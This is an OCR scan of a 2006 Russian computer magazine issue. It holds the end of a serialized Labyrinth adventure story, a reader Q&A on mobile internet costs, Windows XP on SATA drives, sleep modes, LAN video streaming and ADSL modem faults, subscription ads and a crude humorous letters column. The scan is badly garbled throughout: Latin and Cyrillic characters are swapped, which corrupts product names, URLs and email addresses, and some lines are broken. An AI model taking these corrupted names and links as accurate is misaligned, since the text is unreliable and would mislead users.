— А это твои друзья? — спросил Лайс. 

— Можно и так сказать. Здесь любого, кто 
не собирается тебя убить, можно считать 
другом. Вообще Лабиринт сближает людей. 
Приходи сюда вместе со своим злейшим 
врагом, проведите вместе несколько дней и 
станете неразлучными друзьями. Поверь мне. 
Тоннель, по которому они поднимались, рас- 
ширился и впереди показался яркий свет. 

— Вот и выход, — сообщила амазонка. 

Четверо скитальцев стояли на поверхности, 
щурясь и пытаясь привыкнуть к солнечному 
свету. Рядом зиял черный вход в внешне 
напоминающего заброшенную шахту подзе- 
мелья, из которого они только что выбрались. 
А вокруг были уже знакомые Лайсу улицы 
города-призрака. 

— Идем, мы уже близко. 

Странная троица передвигалась осторожно, 
постоянно оглядываясь. Негр Джуд держал 



наготове винчестер, старик не снимал руку 
с рукояти самурайского меча. Они миновали 
два квартала и подошли к наглухо закрытому 
гаражу. Мирва оглянулась по сторонам и 
нажала на кнопку рядом с массивной метал- 
лической дверью. Очевидно, где-то рядом 
находился объектив камеры, так как дверь тут 
же со скрипом поднялась. 

— Скорей! — Девушка юркнула внутрь 
первой, за ней — дядюшка Бо. Лайс был пос- 
ледним, ворота за ним тутже закрылись. 
Помимо трех уже знакомых Лайсу людей, 
внутри находились еще человек десять. 
Многие из них имели похожий на Мирву вид, 
но пара человек носила стандартный костюм 
для Лабиринта. Впрочем, была еще одна 
черта, которая отличала долгожителей от 
новичков — у каждого из ветеранов на поясе 
висел нож или пистолет. Все они собрались 
вокруг путников. 

— Добро пожаловать в Аутпост! — объявила 
Мирва. 

Лайс вежливо кивнул людям. 

— Следуй за мной, тебя ждет председатель. 
Они прошли через короткий коридор в ограж- 
денную простенькой занавеской комнату, где, 
склонившись за письменным столом, работал 
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«СТРАННАЯ ТРОИЦА ПЕРЕДВИГАЛАСЬ 
ОСТОРОЖНО, ПОСТОЯННО ОГЛЯДЫВА- 
ЯСЬ. НЕГР ДЖУД ДЕРЖАЛ НАГОТОВЕ 
ВИНЧЕСТЕР, СТАРИК НЕ СНИМАЛ РУКУ 
С РУКОЯТИ САМУРАЙСКОГО МЕЧА» 



крепкий темноволосый мужчина лет пятиде- 
сяти. Пайс обратил внимание, что все комна- 
ты в этом подвале были освещены банками с 
помещенными внутрь крупными светлячками. 
Как их там назвала Мирва, светоиды? 

— Новенький! Зовут Пайс, — представила 
девушка гостя. 

Председатель жестом пригласил Пайса при- 
сесть. Мирва вышла, оставив их наедине. 
Мужчина не спешил начинать разговор, про- 
должая что-то писать, Пайс терпеливо ждал. 

— Новенький, говоришь? — Наконец поднял 
голову председатель. — А у нас другая ин- 
формация. Я слышал, банда Г рима настолько 
обнаглела, что решила подослать к нам 
крысу. Ты ничего такого не слышал? 

Мужчина сверлил его глазами, и Пайс понял: 
его проверяют. Они принимают его за кого-то 
другого. 

— Послушайте, я не собираюсь у вас здесь 
торчать и что-то вынюхивать. Мне нужно как 
можно быстрее перейти в следующий квад- 
рат. И я был бы вам признателен за помощь. 

— Ас чего ты решил, что мы будем тебе 
помогать? 

— Не знаю. Мирва сказала, что в Лабиринте 
все скитальцы — по сути, друзья и выручают 
друг друга. 

— Значит, по-твоему, я считаю тебя другом? 
Председатель загоготал. 

— Мирва — ветеран Лабиринта, и с ее мне- 
нием нужно считаться, но иногда она говорит 
глупости. 

— Саймон, — протянул руку мужчина. Лайс 
с готовностью пожал. — Я знаю, ты не один 
из этих ублюдков, которые ждут не дождутся 
нашего разорения. Мне сказали, что тебя 
нашли в древних катакомбах. Бандиты Г рима 
не любят спускаться вглубь. Так что я тебе 
верю. К тому же у тебя взгляд новичка, это 
видно сразу. 

Лайса эта фраза задела, но он решил про- 
молчать. 



— У нас тут небольшое убежище для ски- 
тальцев, можно остановиться на некоторое 
время, подкрепиться и затем продолжить 
путь. Если, конечно, ты еще не утратил веру в 
большую Мечту. Хотя ты еще для этого слиш- 
ком мало здесь пробыл. 

— А ты утратил? — спросил Лайс. 

— Не хочу тебя разочаровывать, но я 
достаточно долго мотался по этим мирам, 
чтобы понять одну простую вещь — нет 
никакого конца, нет цели. Лабиринт — сам 
по себе одна большая западня, из которой 
нет пути назад. Многие со мной не согласны и 
проводят всю свою жизнь здесь, скитаясь по 
секторам и исследуя дюйм за дюймом. 

— Я найду портал, когда-нибудь ты узнаешь 
об этом, — сказал Лайс. 

Саймон улыбнулся. Наверное, он слышал это 
уже много раз. 

— Куда ты направляешься? 

— На север. В зону Руины Рахрайма. 

— Не советовал бы туда соваться человеку с 
твоим опытом. Даже Мирва и Джуд побаива- 
ются этого сектора. 

Лайс пожал плечами. 

— Впрочем, как знаешь. Я готов помочь тебе 
и выделить транспорт, но взамен ты должен 
кое-что для меня сделать. 

— Не знаю, как тебе удалось уговорить 
Саймона выделить катер. У нас каждый литр 
дизеля на счету, — Мирва выкатила стран- 
ный агрегат на воздушной подушке — смесь 
мотоцикла с водным скутером — и залила в 
бак топливо. 

— Наверное, я ему чем-то понравился, 

— предположил Лайс. 

О настоящей причине он умолчал, хотя слова 
Саймона не выходили из головы: 

«Один из моих помощников, которых я послал 
отслеживать действия банды, сообщил, 
что среди нас в Аутпосте шпион Г рима. Я 



не знаю, кто это и как давно он тут вынюхи- 
вает, поэтому не могу доверять никому. Но 
ты пришел сегодня и вне подозрений. Мне 
нужно доставить важное сообщение своему 
приятелю на севере по имени Зуелу. Это 
довольно специфический человек, но первое 
впечатление о нем может быть обманчиво. 
Передай ему это письмо, он поможет тебе в 
твоих дальнейших поисках. И держи язык за 
зубами. Я попрошу Мирву сопровождать тебя 
до границы, дальше будешь добираться сам». 

— Эй, не спи. Садись назад, — услышал Лайс 
голос Мирвы. 

Амазонка устроилась за рулем, вставив в чехол 
на боку катера помповое ружье. Лайс сел за 
ней. Агрегат тихо завелся и покатил с прилич- 
ной скоростью по главной улице города. 

— Сколько нам ехать? — спросил он. 

— До границы около сорока минут езды. 

Если, конечно, ничего не случится в дороге. 
Они миновали несколько кварталов и доб- 
рались до окраины. Дома стали попадаться 
реже, в основном, вокруг были пустыри и 
заброшенные сарайчики. Раскинувшиеся 
впереди земли напомнили Лайсу о Техасе, 
который он видел на иллюстрациях в книгах. 
Не хватало разве что ковбойских ферм и 
коровьих стад. 

На двадцатой минуте езды, когда город уже 
остался позади, вдали раздался шум мото- 
ров. Лайс оглянулся и увидел приближающи- 
еся клубы пыли. Мирва их также заметила и 
смачно выругалась. 

— Дьявол, только этого нам не хватало. 

— Что это? — спросил Лайс, понимая, что 
ничего хорошего ожидать не стоит. 

— Погоня, — объяснил Мирва. — Рейдеры из 
банды Грима. 

Девушка прибавила газу, но дистанция между 
ними и преследователями продолжала быст- 
ро сокращаться. 2 

Продолжение следует... 



ХАКЕР 12/96/ 06 
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СТЕПАН «ЗТЕР» ИЛЬИН 



НАСКРАОГаКЕАІ. 



ХАКЕР. 



ЗАДАВАЯ ВОПРОС, ПОДУМАЙ! 

НЕ СТОИТ ПОСЫЛАТЬ МНЕ ВОПРОСЫ, ТАК ИЛИ ИНАЧЕ СВЯЗАННЫЕ С 
ХАКОМ/КРЯКОМ/ФРИКОМ, ДЛЯ ЭТОГО ЕСТЬ НАСК-ЕАО (НАСКЕАО@ВЕАІ_. 
ХАКЕР. ВЫ). НЕ СТОИТ ТАКЖЕ ЗАДАВАТЬ ОТКРОВЕННО ЛАМЕРСКИЕ ВОП- 
РОСЫ, ОТВЕТ НА КОТОРЫЕ ТЫ ПРИ ОПРЕДЕЛЕННОМ ЖЕЛАНИИ МОЖЕШЬ 
НАЙТИ И САМ. Я НЕ ТЕЛЕПАТ, ПОЭТОМУ КОНКРЕТИЗИРУЙ ВОПРОС, ПРИ- 
СЫЛАЙ КАК МОЖНО БОЛЬШЕ ИНФОРМАЦИИ. 



О: Парни, привет! Как-то раз перечи- 
тывал вашу статью из апрельского 
номера за 2005 год, в которой речь 
шла о замечательной технологии 
СРК5. Так вот я им часто пользуюсь 
и для этого юзаю самые разнообраз- 
ные программы: орега-тіпі, ЬотЬііз, 
Ітаііадепі. Помимо этого, иногда 
юзаю его в связке с ноутбуком. 
Возник такой вопрос: как сделать 
серфинг инета через мобилу хотя 
бы чуть-чуть дешевле? Того и гляди, 
скоро разорюсь. 

А: Самоеглавное — уяснить себе, что про- 
вайдер нф тарифицирует трафик строго по 
килобайтам. У него своя система, не выгод- 
ная для клиента. Чаще всепо тарификация 
осуществляется по 100 Кб. Иначе говоря, 
сколько бы ты ни потратил, 1 килобайт или 
1 00", со счета все равно спишут одно и то 
же количество денежек. По этой причине 
нет'смысла подключаться к инету, чтобы от- 
править мессагу по аське. Дешевле выйдет 



обычная Зтз‘ка. А если уж и подключаться, 
то всерьез и надолго, при этом не закрывая, 
а при необходимости сворачивая активные 
приложения (іітт, орега-тіпі и т.д.). К счас- 
тью, даже во время активной ОРРЗ-сесЬии 
ты по-прежнему сможешь осуществлять и 
принимать звонки. 

Если телефон оОРРЗ используется в ка- 
честве модема на компьютере, можно пойти 
еще налару ухищрений, прежде всего на 
сжатие трафика. Сетевые протоколы уже 
давно поддерживают возможность прозрач- 
ного сжатия информации, что называется, 
налету. Окажу больше: некоторые НТТР- 
прокси по умолчанию поддерживают такую 
опцию, как сжатие НТТР-содержимого. 

Ее использование не только ускоряет 
производительность, -но и существенно 
удешевляет ѵѵеЬ-серфинг. Серфинг с ис- 
пользованием "Такой Прокси и без нее имеет 
существенные различия, но ее еще нужно 
найти ! Лучше всего вообще арендовать для 
себя шелл или ѴЭЗ, где и разместить свой 



собственный сервер. Только в этом случае 
можно давать хоть какие-то гарантии по, 
поводу ее работоспособности. Помимо это- 
го, обязательно попробуй веб-ускорители. 
Некоторые из них действительно могут дать 
результат, и в первую очередь это.касае.тся 
Соодіе ѴѴеЬ Ассеіегаіог ( ѵѵеЬассеІегаіог. 
доодіе.сот ). Разработка от Гугла исполь- 
зует сразу 3 приема: сжатие трафика, 
кэширование страничек и упреждающую 
загрузку (передача данных до посылки 
запроса). Клиентская часть акселератора 
выполнена в виде активной панели для 
Іпіегпеі Ехріогег 6.x и РігеРох-1 ,0+~. Кроме 
того, рекомендую взглянуть на ОІоЬах 
(ѵуѵууѵ.аІоЬах.іпЫ . прекрасно зарекомендовав- 
ший себя в спутниковом интернете; РРОРЕІ_ 
( уууууу.ргоре1.сот ). хорошо сжимающий не 
только текстовое содержимое, но и графи- 
ческие изображения; РаЫэіі ( ѵѵѵѵѵѵ.'кГеІекоге. 
ога/гаЫэіЛ - наверное, лучший бесплатный 
— ѵѵёЬ -ускоритесь, снимающий как тексто- 
вику, так и изображения. 
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О: Не устанавливается ѴѴіпсІоѵѵз ХР на 
$АТА-винчестер. Что делать? 

А: Для начала изучи свой дистрибутив с 
виндой. Если ты достал диск из запылившей- 
ся коробочки, которая давным-давно лежит 
в недрах твоего шкафчика, то лучше найди 
чтошибудьпосв.ежее. Необ^одимр^чтобы— 
в дистрибутив был интегрирован второй 
сервис-пак. Впрочем, даже в этом случае под- 
ходящего; драйвера в нем может не оказаться, 
поэтому его придется интегрировать самому. 

К счастью, можно обойтись без долгой ручной 
правки дистрибутива и сделать все за минуту- 
другую через замечательную утилиту пІ_ііе 
( ѵѵѵѵѵѵ.піііеоз.сот ). 

О: Зачем вообще нужны спящий и 
ждущий режимы? Что лучше и для 
чего применяется? 

А: Лично я активно использую эти режимы 
во время работы на ноутбуке. Согласись', на- 
много удобнее, когда операционная система 
готова к работе через 1 5 секунд, чем когда 
надо ждать полной загрузки компьютера, ОС, 
многочисленных служ'б и программ. К тому 
же в этом случае можно сразу приступить к 
работе именно там, где закончил, вплоть до 
нужной строчки в исходнике. ѴѴіпбоѵѵз, а также 
большинство современных Опіх-дистрибу- 
тивов поддерживают следующее режимы 
перевода системы в состояние пониженного 
энергопотребления: ЗизрепсІ іо РАМ (он же 
ждущий режим) и ЗизрепсІ іо Эізк (спящий 
режим, НіЬегпаіе). В первом случае засыпание 
осуществляется практически моментально и 
достигается путем отключения всей перифе- 
рии, процессора, видеокарты и т.д. 

В активном состоянии остается только память, 
где и хранятся рабочие области операционной 
системы и приложений. Если речь идет о ноут- 
буке, то он продолжает потреблять небольшое 
количество энергии, ко после продолжитель- 
ного времени батарея может сесть. Такой 
режим стоит использовать только тогда, когда, 
лишь ненадолго отходишь от компьютера. 
ЗизрепсІ іо Эізк, как несложно догадаться по ■ 
названию, сохраняет полную конфигурацию 
машины (состояние внутренних регистров 
процессора, оперативной памяти и т.д.) на 
жеоткий дмск. Вотом режиме текущая кон- 
фигурация машины (включая оперативную и 
видеопамять) сбрасывается в специальный 
файл на винчестере. При этом компьютер 
выключается и фактически не потребляет 
энергию. Жаль только!, что переход в этот 
режим, как и возвращение к'нормальному 
рабочему состоянию, занимает намного боль- 




ше времени из-за операции чтения/записи с 
относительно медленным жестким диском. 
Встроенная поддержка есть в ѴѴіпбоѵѵз 2000 
и ѴѴіпбоѵѵз ХР, но очень часто ее необходимо 
вручную активировать в одной из вкладок в 
настройках электропитания. 

О: Как можно организовать вещание 
видео в небольшую сеть (около 30 
компов). Если с радио все более или 
менее понятно (да и статьи про это у 
вас уже были), то как быть с ТѴ? Это 
вообще возможно? 

А: Конечно, возможно, но все зависит от того, 
что будет источником сигнала. Идеальный 
вариант, когда в качестве источника высту- 
пают данные в цифре. Этого можно добиться 
только одним путем — получая их со спутника. 
В одном из номеров, в котором подробно рас- 
сказывалось о спутниковом телевидении, мы 
особенно рекомендовали тебе использобать 
программу РодЭѴВ ( ѵѵѵѵѵѵ.ргоабѵЬ.сот/гиз/ 
іпбех.ІгітП . Бесплатная, простая в настройке и 
чрезвычайно функциональная, она позволяет 
не только самому смотреть видео со спутника 
в отменном качестве, но и вещать его в ло- 
кальную сеть. В самом простом случае тебе 
достаточно будет выбрать нужный канал и 
активировать в настройках опцию широкове- 
щательной трансляции. Клиентам, предва- 
рительно установившим всетотже РгодЭѴВ, 
достаточно указать в качестве источника 
сигнала твой сервер и рразу приступать к 
просмотру. Но вот проблема: получается, 
что каждый юзер в локалке будет смотреть 
только тот канал, который выбрал ты... Разве 
это дело? І~ораздо лучше, если пользователь 
получит право выбора: будет ли это современ- 
ная музыка, ретро или порнушка на соседнем 
канале. И такую возможность предоставляет 
специальный плагин Ргод Мебіазегѵег/сііепі, 
подробности о котором ты узнаешь на офици- 
альном сайте программы. 

А как же быть, если в распоряжении имеется не 
спутниковый комплект, а всего лишь ТѴ-тюнер? 
На этот случай существует замечательная про- 
грамма РІуЭЗ ( ѵѵѵѵѵѵ.азѵхгх.сот ). которая выше 
всех конкурентов на две головы и вообще уде- 
лывает их по всем параметрам. Как еще можно 
похвалить-программу, которая умеет в режиме 
реального времени оцифровывать аналоговое 
изображение и вещатыего в сеть? Причем- для 
этого нужно-то указать порт, на котором будет 
осуществляться вещание, экранное разреше- 
ние, используемые фильтры — и все! Теперь 
клиентам остается лишь в ѴѴіпбоѵѵз МебіаРІауег 
указать адрес сервера и порт! Лепота! 




О: Купил АО§І.-модем О-Ыпк. Постоян- 
но падает линк, хотя с проводкой все 
ОК (просмотрел лично сам до щитка). 
Подскажите, как пофиксить! 

А: Для начала стоит залить в модем новую 
прошивку или (если модем подключается 
по 115В) драйверы. Новые версии іістѵѵаге, 
равно как и инструкции по их использованию, 
. которые сдедует-читать очень внимательно, 
всегда доступны на официальном сайте 
производителя . Помимо этого, не поленись 
проштудировать форум, где пользователи 
охотно делятся своими- впечатлениями об- 
использовании новых версий прошивок и 
рассказывают о своих проблемах. К тому же 
для модемов Э-Ыпк распространяются еще и 
альтернативные прошивки от независимых 
разработчиков. Все это возможно благодаря 
тому, что модем — это вполне самостоятель- 
ное устройство с РІЗС-процессором и опера- 
ционной системе на базе 11МХ. При большом 
желании провести небольшой тюнинг мо- 
жешь и ты, подсоединившись к модему через 
іеіпеі. Что касается веб-интерфейса, то тебе 
обязательно стоит заглянуть в раздел со все- 
возможной статистикой. По уровню сигнала, 
количеству коллизий и ошибок в приемо- 
передаче, можно судить о качестве линии. 

Не достаточно просто оценить внешний вид 
телефонной проводки до щитка (ее, кстати 
говоря, лучше всего протянуть с помощью ви- 
той пары), чтобы утверждать о ее состоянии. 
Необходимо позвонить на АТС и заказать 
полную проверку линии. Это минутное дело 
может разъяснить сложившуюся ситуацию. 
Тем более это совершенно бесплатно. 

И еще: возможно, проблема в некачествен- 
ном сплиттере. 

О: Привет, хакеры! Скажите, какой 
привод лучше взять для чтения 
таких дисков, на которые перешли 
вы (9 Гб)? 

А: Любойюовременный (и даже не очень 
современный) привод такие диски про- 
читает. Скажу больше: скорее всего твой 
ЭѴЭ-РОМ даже не заметит разницы. 

И все потому, что фактически изменить- 
ся только размер диска, в то время как 
его формат остался прежним. Он как ■ 
был ЭѴЭ-РОМ, так им и останется. Это 
достигается за счет производства дисков 
на заводе, хотя ^записанная двухслойная 
болванка (которую, например, мы отдаем 
на завод для штамповки тиража) Прочита- 
ется далеко не в каждом приводе, так как 
имеет формат ЭѴЭ-ЭБ. □С 
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РЕДАКЦИОННАЯ 

ПОДПИСКА 



С 1 ОКТЯБРЯ ПО 31 ДЕКАБРЯ ПРОВОДИТСЯ 
СПЕЦИАЛЬНАЯ АКЦИЯ ДЛЯ ЧИТАТЕЛЕЙ ЖУРНАЛА 



ГОДОВАЯ ПОДПИСКА 



НОМЕРОВ! 






ОДИН ЖУРНАЛ 
ДРУГОЙ ТЕМАТИКИ 



ОФОРМИВ ГОДОВУЮ ПОДПИСКУ В РЕДАКЦИИ, ВЫ МОЖЕТЕ 
БЕСПЛАТНО ПОЛУЧИТЬ ОДИН СВЕЖИЙ НОМЕР ЛЮБОГО ЖУР- 
НАЛА, ИЗДАВАЕМОГО КОМПАНИЕЙ «ГЕЙМ ЛЭНД»: 

• ЯНВАРСКИЙ НОМЕР — ПОДПИСАВШИСЬ ДО 30 НОЯБРЯ, 

• ФЕВРАЛЬСКИЙ НОМЕР— ПОДПИСАВШИСЬ 
ДО 31 ДЕКАБРЯ. 



ВПИШИТЕ В КУПОН НАЗВАНИЕ ВЫБРАННОГО ВАМИ ЖУРНАЛА 
ЧТОБЫ ЗАКАЗАТЬ ПОДАРОЧНЫЙ НОМЕР 



И ЭТО НЕ ВСЕ! 



31 ДЕКАБРЯ СРЕДИ ЧИТАТЕЛЕМ, 
ОФОРМИВШИХ ПОДПИСКУ НА ВЕ 
БУДЕТ РАЗЫГРАНО 200 МРЗ ПЛЕЕ 



ВНИМАНИЕ! ВТОРОЕ СПЕЦПРЕДЛОЖ 



ЗА 12 МЕСЯЦЕВ 



При подписке на комплект журналов 
ЖЕЛЕЗО РѴй + ХАКЕР 0Ѵ0+ ХАКЕР СПЕЦ СО: 

1 . годовая подписка по цене 1 1 номеров! - это 3 номера в подарок 

2. ДОПОЛНИТЕЛЬНО СКИДКА 10% на весь комплект 

3. плюс бесплатная подписка на любой журнал (даппе)іапсі на 3 месяца! 
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ВЫГОДА и ГАРАНТИЯ и СЕРВИС 

КАК ОФОРМИТЬ ЗАКАЗ внимание! 



1. Разборчиво заполните подписной купон и квитанцию, 
вырезав их из журнала, сделав ксерокопию или распе- 
чатав с сайта \ллллл/.дІс.ги. 

2. Оплатите подписку через Сбербанк . 

3. Вышлите в редакцию копию подписных документов— 
купона и квитанции —любым из нижеперечисленных 
способов: 

по электронной почте $иЬ$сгіЬе@дІс.ги; 
по факсу 8 (495) 780-88-24; 
по адресу 119992, Москва, 
ул. Тимура Фрун , д. 11, стр. 44-45, 

ООО «Гейм Лэнд», отдел подписки. 
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одписка оформляется в день обработки 
лона и квитанции в редакции: 

в течение пяти рабочих дней после отправки подписных 
документов в редакцию по факсу или электронной почте; 
в течение 20 рабочих дней после отправки подпис 
документов по почтовому адресу редакции. 

оі і ідуем использовать факс или з тронную 
почту, в пос ‘Д і случае предварительно отсканиро- 
вав или сфотографировав документы. 

Подписка оформляется с номера, выходящего через один 
календарный месяц после оплаты. Например, если вы произ- 
водите оплату в ноябре, то журнал будете получать с января. 
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На вопросы отвечал практикующий врач-терапевтЛозовский 



Ргот: К8-ЫЕО-Т (7311223@таіІ.ги) 

ЗиЬіесі 

Здравствуйте, тадагіпе. 

Проблема есть помогите разрулить есть в мегофоне услуга поиска 
места коорденат сотового телефона но кот посылаеться смс нада 
каойнибуть способ поймать эту смс проблема в том что пропала 
подруга и немагу найти ее но знаю мобильник и он раз через раз 
включаеться уже неделю нету вестей от нее вот вопщем воттаквот 
или есле есть кокуенибуть прогу под мегофон чтоб показовола каор- 
динаты мо москве и московской облости ну вопще есле порроссии 
то будит кул плиз хлп уже незнаю кому обратиться чесна пишу всем 
некто не отвечает хоть ответе что нет я буду знать что небыл оставлен 
безвнемание. 

С уважением, КЗ-ЫЕО-Т 

Привет, уважаемый КЗ-ЫЕО-Т! Вообще-то, твое послание рискова- 
ло остаться очередной раз без «внимание». Используя свой талант 
телепатической интроспекции, я понял, что обычному человеческому 
мозгу не дано не только проникнуть в глубины твоих суждений, но 
и просто осилить их графическое отображение. Но поскольку это 
моя работа, я был вынужден расширить границы своего восприятия 
и немного запалить кишку с помощью где-то 0,5 л огненной воды. 
Знаешь ли, это помогло мне прочесть твое письмо полностью. 

Для того чтобы достичь абсолютного понимания, я затарился еще 
и бутылочкой Балтики № 9. Но этот коктейль сыграл со мной злую 
шутку — я упал под стол и лежал там до утра, а вокруг меня летали 
«каординаты» , смс, мобильники и девушка из «облости» по имени 
Прасковья и с грудью-доскою. В общем, что я хочу сказать: нет 
ничего странного, что эта девушка пропала. Не ищи ее — она в хо- 
роших руках. 

Ргот: МурЗгг (турЗгг@таН.ги) 

8иЬіесі: Научите :) 

Здравствуйте, уважаемая редакция журнала ][. Я очень даже 
начинающий юзер. Скажите, с чего мне начать, читаю журнал 
и большую часть слов не понимаю. Вы скажите: «Вбей в поиско- 
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вик», что мне туда вбить? Как стать хакером? Если решитесь мне 
помочь, то я знаю, что такое мыло, аська и другие примитивные 
вещи, им меня учить не нужно. А если решите мне не помогать, 
то не ставьте мое письмо как самое дурацкое — неопытность 
прощается :). 

З.Ы. Спасибо, что дочитали до конца. 

С уважением, турЗ ът. 

Как же тебе не стыдно, уважаемый! Чем же мы заслужили, что наш 
читатель разлива 2006 года демонстрирует нам такой ярый инфанти- 
лизм? Что вбить в поисковик? В качестве ответа я могу привести тебе 
пару цитат. Первая: «Куда ты хочешь попасть?» — «Все равно куда». 
— «Тогда все равно, куда идти» (из «Алисы в стране чудес»). Вторая: 
«Для человека, который не знает, к какой гавани он направляется, 
ни один ветер не будет попутным» (слова Сенеки). Резюме: то, что ты 
хочешь узнать, и надо вбивать в поисковик. 

В далеком 1 998 году, когда рунет был молод, на прилавках разных 
злачных мест лежали диски «Суперхакер» — куча слитых «Телепор- 
том» хак-кряк-варезных сайтов, тру-хакерские езины того времени 
и многое другое. Из него я, кстати, узнал про ІпТесІесІ Ѵоісе и стал его 
регулярным читателем. В общем, этот диск я нашел в своих закромах 
и слил образ Степу. Кое-что, конечно, цензура выкинет, но даже то, 
что останется, позволит тебе окунуться в атмосферу тех времен. 
Читай и больше нас не огорчай! 

Р.З. «Помоги, помоги мне. . . я хочу рассказать, в чем дело. . . Помоги, 
помоги мне, я хочу, чтоб моя душа тоже пела» (с) ДеЦл. 

Ргот: Павел Марков (ІоЬо$17@таіІ.ги) 

ЗиЬіесі: Кто пишет аля вашего журнала статьи? 

Привет, «Хакер», я недавно стал читать ваш журнал и обнаружил, что 
в нем, кроме статей ваших постоянных авторов, появляются статьи 
от совсем мне неизвестных людей. Причем темы этих статей далеки 
от основной идеи вашего журнала. Не значит ли это, что любой 
более-менее грамотный человек может написать для вас интересную 
статейку? 



ХАКЕР 12/96/ 06 
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Р.З. Понимаю, что вам мылят все, кому не лень, поэтому буду безмер- 
но благодарен зато, что вы хотя бы дочитаете мое письмо, и вообще 
буду на седьмом небе, если вы мне ответите! 

Конечно же, нам пишут не только постоянные и известные авторы, но 
и различные темные персонажи, которых мы подбираем на площади 
трех вокзалов или около строгинских общаг. Те самые, которые стоят 
там с табличками типа «Пишу на Си заеду», «ѴѴіІІ Тиск Тог Ьеег» , «Памаги- 
те налеченийев гирмании» и т.д. Если смог написать табличку, значит 
грамотный, значит и статью написать сможет. Как говорят некоторые 
хирурги: «Не умеешь вязать узлы? Шнурки умеешь завязывать? Значит, 
и тут завяжешь». Так что, если ты более-менее грамотный, знаешь, как 
писать «оро-оло» и «жи-ши», пиши нам — будем безмерно рады. 

/тот; Зрат (гооІкіІГіипІег@таіІ.ги) 

ЗиЬіесі: ѴізиаІ Нас к ++ 

Ітрогіапсе: НідЬ 

Доброго времени суток, товарищи хакеры. 

Большое Вам спасибо за подшивку журналов в рсІГ У меня была 
такая, но не совсем полная, и многого не хватало. Размер прилагае- 
мого диска теперь 9 Гб — вообще отлично! Может, Вы в следующих 
номерах выложите «Хакер Спец» и «Железо». А еще очень большая 
просьба выложить все видео по визуал-хаку, начиная с самого 
первого. Я думаю, все читатели это оценят. Кстати, ребята, Сатіазіа 
Зіисііо, конечно, рулит, но лучше делайте не флешками, а в обычном 
радующем душу аѵі :). Один мой знакомый вообще смотрит визу- 
ал-хак Вашего журнала на телеке с помощью такого девайса, как 
БУО-плеер :). Ну, пора закругляться, респект и уважуха, хорошего 
коннекта, как говорится. . . 

С уважением, Зрат 

Р.З. Зрат — это ник, а не то, что Вы подумали ;). 

Большое спасибо? А ты знаешь, что спасибо не булькает, что его 
нельзя положить в карман и из него не варится каша? Не знаешь? 

Да ладно, рады стараться, хотя 9 Гб свежачка накачать — это тебе не 
фунт изюму съесть. Степ буквально трещит по швам, и даже рекомен- 
дованный Ассоциацией украинских психиатров плакат «для зняття 
стресу» не действует. Чтобы горячие подмосковные блондинки могли 
помочь ему в плане снятия стресса, он решил себя немного разгру- 
зить и нашел себе помощников — двух расторопных зеленых иноп- 
ланетян с планеты Омикрон-9. Так, кажется, я немного гоню. Может 
быть, это инопланетные роботы-убийцы со встроенными виброоргаз- 
мотронами на головном конце и ОѴО-резаком на противоположном? 
Вроде бы, тоже нет :(. Ну, неважно. Респект и уважуха, и да не сдохнет 
твой модем в недалеком будущем, и да пребудет с тобой Коннектий! 

/тот; Евгений Нужный (пигІіпуі@таіІ.ги) 

ЗиЬіесі: Привет, редакция )( 

Привет, ][акеры! Очень люблю ваш журнал, но, к большому сожале- 
нию, у меня нет возможности покупать каждый выпуск :(. Увлекаюсь 
компьютерами, радиоэлектроникой и разного рода мобильной тех- 
никой (типа мобильных телефонов и пр.). Своего компьютера пока не 
имею :-( (благо всегда есть друзья с машинами ;-)), собственно, из-за 
этого вам и пишу. Пришло время (появились $) мне покупать комп, 
но, так как у меня практики не было почти никакой, не знаю, что луч- 
ше брать. Поэтому вас, как спецов в области компьютерного железа, 



прошу помочь мне с выбором комплектующих и написать хотя бы 
небольшой, но содержательный рассказ о совместимости компью- 
терного железа, и вообще о том, какие девайсы какого производите- 
ля лучше брать (преимущественно категорий «производительность» 
и «цена/качество_производительность»). Очень надеюсь на вашу 
помощь. Ответ прошу написать на е-таіі: пигііпуі @ таіі.ги. Заранее 
СПАСИБО:)! 

Ыигііпуі 

Привет, Нужный! 

Крутая у тебя фамилия, а главное — позитивная. Хорошо, например, 
что не «Нужник» :). Судя по твоему описанию, ты какой-то жестокий 
компьютерный скиталец, который творит злые дела на чужих тачках, 
чтобы не палить себя :), и оправдывает это отсутствием собственной. 
На самом деле, нормальный комп для хака можно выменять на пиво 
(причем с СО-приводом) и наживить на него старую БЗДю. Так что не 
прикидывайся гофрошлангом, иди в магазин и покупай компьютер, 
не стесняйся :). А если не справишься сам, пиши знатокам умствен- 
ного (и не только) онанизма из журнала «Железо», они тебе помогут 
собрать любую тачку! 

/тот; затгаі (затгаШЬк.ш) 

ЗиЬіесі: Дорогая редакция 

Появлением двухслойных БѴБ восхищен. Даешь дистрибутивы 
ОеЫап Ііпих в ближайших номерах. 

Ынжынер, чирти исчо! 

Пей водка — будь бамбуча! 

Сопіасі те Ьу Е-таіІ ог а\ ІСО: 200773600 
АІзо уои сап сопіасі те іііеге: 

ІВСзегѵег: ігсТогезІпеГогд 

сііаппеі: #ги_етЬесІсІесІ 

роПз: 6667, 6669 ог 7000 (срі 251 ), 6668 (коі8г) 

Зело рад! Зри, человече! Будет тебе Дебиан! Кстати, у тебя настоя- 
щая фидошная подпись, давай, я тоже отожгу в таком духе: 

«Быть бамбуча — это есть кал полной ложкой! 

Можно подтираться ежиком, но зайцем приятнее. 

ФИДО — рулез». 

/тот; копуокоѵ@уопЬех.ги 

ЗиЬіесі: Привет, магазин! 

Привет, магазин! 

Купил журнал, читаю, не могу оторваться! Интересно, просто ах. . . 
Октябрьский номер, имхо, один из немногих действительно интерес- 
ных номеров за последнее время! 

Продолжайте так дальше! 

З.Ы. 9 Гб софта — это просто офигенно! С.п.а.с.и.б.о.! 

С уважением, АіЛозреІезЮІиІі — Каз 

Ах, какой пассаж! Спасибо тебе на добром слове, о человек с ал- 
коголической фамилией! Для тебя же старались, для тебя делали 
большой диск, с которого удобно ставить проги, но и на который 
можно ставить стопочку конъячковского :). Шучу. В общем, резюме: 
Телепузики, давайте обнимемся! ІЬИ 
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Если при нажатии 
на кнопку двигатель 
не завелся - срочнс 
купите журнал ая&ца 
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ХАКЕРСКИЕ ГОНКИ 

О АТЕ: начало января 

І-ОСАТІОІЧ: редакция «Хакера» в Москве 

ЕѴЕМТ: тусня с редакцией, показ презентации по ІТ-безопасности и безумные хакерские гонки на радиоуправляемых машинках 
ОЕЗСВІРТІОІЧ: Приглашаем самых верных читателей потусоваться в редакции сразу после новогоднего веселья. Гвоздь программы 
— гонки на радиоуправляемых модельках и показ элитной зесигііу-презентации :). Для участия необходимо прислать свою заявку 
на гасІіосаг@геаІ. хакер. ш. В теме письма нужно указать число «31337-1 ». 
